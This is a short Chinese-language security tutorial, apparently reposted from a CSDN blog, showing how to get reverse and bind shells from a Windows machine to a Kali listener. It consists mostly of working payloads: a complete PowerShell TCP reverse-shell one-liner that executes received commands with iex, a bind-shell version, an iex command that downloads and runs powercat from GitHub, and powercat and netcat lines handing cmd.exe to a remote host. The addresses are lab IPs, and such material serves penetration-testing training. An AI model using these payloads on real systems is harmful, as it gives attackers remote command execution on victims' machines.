【信息安全】反弹shell
作者:互联网
1、windows-powershell反弹shell
kali作为服务端,windows使用powershell连接kali,并将自己的shell给kali
- windows端
$client = New-Object System.Net.Sockets.TCPClient('192.168.57.200',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
- kali端
nv -lvnp 4444
2、windows – powershell 绑定shell
windows作为服务端,将shell与监听端口做绑定,kali作为客户端去连
- windows端
$listener = New-Object System.Net.Sockets.TcpListener('192.168.57.1',4444);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();
- kali端
nc -nv 192.168.57.1 4444
3 使用powercat反弹shell
powercat需要单独下载,windows未内置,kali可直接使用
sudo apt install powercat
安装
- windows安装powercat
# `此方法仅对当前终端有效,且需要主机可以连接公网`
iex (New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1")
# 反弹shell给kali,此时kali需要作为服务端监听
powercat -c 192.168.57.200 -p 4444 -e cmd.exe
# windows作为服务器,将shell绑定到监听的端口
powercat -l 192.168.57.1 -p 4444 -e cmd.exe
- kali
# kali启动监听,windows端主动去连接
nc -lnvp 4444
# kali作为客户端去连接windows服务端
nc -nv 192.168.57.1 4444
标签:powercat,shell,windows,kali,信息安全,bytes,4444,反弹 来源: https://blog.csdn.net/Nicky_Zheng/article/details/109645674